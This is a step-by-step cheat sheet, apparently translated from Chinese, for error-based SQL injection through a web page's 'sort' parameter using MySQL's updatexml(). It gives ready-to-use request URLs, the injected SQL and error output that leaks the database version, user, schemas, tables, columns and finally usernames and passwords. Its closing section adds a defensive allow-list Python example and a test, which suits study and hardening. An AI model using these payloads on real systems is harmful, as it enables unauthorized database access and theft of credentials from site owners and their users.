0x00 How to remember it
updatexml(1,concat(0x7e,(payload),0x7e),1)
0x01 Extracting the database version
Web request: http://www.xxx.com/sql.php?sort=id, updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
Database statement: select * from test order by id, updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);
Database execution result
mysql> select * from users order by id, updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53~'
0x02 Extracting the current connection user
Web request: http://www.xxx.com/sql.php?sort=id, updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);
Database statement: select * from test order by id, updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);
Database execution result
mysql> select * from users order by id, updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
0x03 Extracting the currently connected database
Web request: http://www.0-sec.org/sql.php?sort=id, updatexml(1,concat(0x7e,(SELECT database()),0x7e),1);
Database statement: select * from test order by id, updatexml(1,concat(0x7e,(SELECT database()),0x7e),1);
Database execution result
mysql> select * from users order by id, updatexml(1,concat(0x7e,(SELECT database()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~security~'
0x04 Extracting database names
Note: changing the LIMIT offset shows the other database names
For example:
LIMIT 0,1 (offset 0) returns the 1st database
LIMIT 1,1 (offset 1) returns the 2nd database
Web request: http://www.xxx.com/sql.php?sort=id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1),0x7e),1)
Database statement: select * from test order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1),0x7e),1);
Database execution result
mysql> select * from users order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~~information_schema~~'
0x05 Extracting table names
Note: changing table_schema=xxx to another database returns that database's data
For example:
table_schema=database() returns data for the currently connected database
table_schema='test' returns data for the test database
Note: changing the LIMIT offset returns a different table name
For example:
LIMIT 0,1 (offset 0) returns the 1st table
LIMIT 1,1 (offset 1) returns the 2nd table
Web request: http://www.xxx.com/sql.php?sort=id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1),0x7e),1)
Database statement: select * from test order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1),0x7e),1);
Database execution result
mysql> select * from users order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~~emails~~'
0x06 Extracting columns
table_schema = "xx" is the database to inspect
table_name = "xx" is the table to inspect
limit 0 is the position to extract
For example:
The table tdb_admin has the columns id, username, password
limit 0 = id
limit 1 = username
limit 2 = password
Web request: http://www.xxx.com/sql.php?sort=users, updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_schema='security' and table_name='users' LIMIT 0,1),0x7e),1)
Database statement, extracting the column names of the users table in the security database:
select * from users order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_schema=database() and table_name='users' LIMIT 0,1),0x7e),1);
Database execution result
mysql> select * from users order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_schema=database() and table_name='users' LIMIT 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~~id~~'
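0x07 Extracting content
Note: the limit offset selects which row is displayed
limit 0 is the first row
limit 1 is the second row
In the two statements below, 字段名 stands for a column name and 库名.表名 for database name.table name.
Web request: http://www.xxx.com/sql.php?sort=id, updatexml(1, concat(0x7e,(SELECT distinct concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e) FROM 库名.表名 limit 0,1)),1)
Database statement: select * from test order by id, updatexml(1, concat(0x7e,(SELECT distinct concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e) FROM 库名.表名 limit 0,1)),1)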
Database execution result:
mysql> select * from users order by id, updatexml(1, concat(0x7e,(SELECT distinct concat(0x7e,id,0x3a,username,0x3a,password,0x7e) FROM security.users limit 0,1)),1);
ERROR 1105 (HY000): XPATH syntax error: '~~1:Dumb:Dumb~'
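Every statement above works because the sort parameter is pasted into ORDER BY as text. The following is an added example, not code from the original page: it shows that concatenation pattern next to an allow-list version. The SORTABLE mapping, the function names and the "-" prefix for descending order are assumptions made for the illustration.

```python
import re

# Hypothetical allow-list for the page's sql.php?sort= parameter:
# public sort key -> fixed column identifier used in the query.
SORTABLE = {"id": "id", "username": "username"}
_KEY = re.compile(r"^(-?)([a-z_]+)$")

class RejectedSort(ValueError):
    """Raised when the sort parameter is not made of allow-listed keys."""

def order_by_unsafe(sort):
    # The pattern the page relies on: the parameter is pasted into ORDER BY.
    return "select * from users order by " + sort

def order_by_safe(sort, max_terms=2):
    # ORDER BY takes identifiers, which cannot be bound as parameters,
    # so each term is looked up in the allow-list instead of being escaped.
    terms = sort.split(",")
    if len(terms) > max_terms:
        raise RejectedSort("too many sort terms")
    cols = []
    for term in terms:
        m = _KEY.match(term.strip())
        if not m or m.group(2) not in SORTABLE:
            raise RejectedSort("unknown sort key: %r" % term[:40])
        direction = "DESC" if m.group(1) else "ASC"
        cols.append("`%s` %s" % (SORTABLE[m.group(2)], direction))
    return "select * from users order by " + ", ".join(cols)

# The sort value from section 0x01 of the page, used as test input.
PAGE_SORT = "id, updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)"

def is_rejected(sort):
    try:
        order_by_safe(sort)
        return False
    except RejectedSort:
        return True

if __name__ == "__main__":
    print(order_by_unsafe(PAGE_SORT))     # function call reaches the database
    print(order_by_safe("id,-username"))  # only fixed identifiers reach it
    print(is_rejected(PAGE_SORT))
```

Returning a generic error page instead of the MySQL error text removes the output channel shown in the execution results, but not the injection itself; the allow-list is what closes it.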